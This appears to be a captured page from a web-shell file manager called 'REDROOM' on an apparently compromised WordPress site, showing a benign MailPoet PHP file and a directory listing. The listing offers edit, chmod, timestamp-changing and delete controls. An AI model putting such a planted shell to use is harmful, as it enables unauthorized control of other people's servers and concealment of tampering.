REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 504 B
Close
/home/nshryvcy/himaltourism.com/wp-content/plugins/mailpoet/lib/AutomaticEmails/AutomaticEmailFactory.php
Text
Base64
<?php declare(strict_types = 1); namespace MailPoet\AutomaticEmails; if (!defined('ABSPATH')) exit; use MailPoet\AutomaticEmails\WooCommerce\WooCommerce; use MailPoet\DI\ContainerWrapper; class AutomaticEmailFactory { /** @var ContainerWrapper */ private $container; public function __construct( ContainerWrapper $container ) { $this->container = $container; } public function createWooCommerceEmail(): WooCommerce { return $this->container->get(WooCommerce::class); } }
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 1 × Files: 3
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
WooCommerce
DIR
-
drwxr-xr-x
2023-04-04 05:35:40
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
AutomaticEmailFactory.php
504 B
lrw-r--r--
2023-04-04 05:35:40
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
AutomaticEmails.php
3.73 KB
lrw-r--r--
2023-04-04 05:35:40
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
index.php
0 B
lrw-r--r--
2023-04-04 05:35:40
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).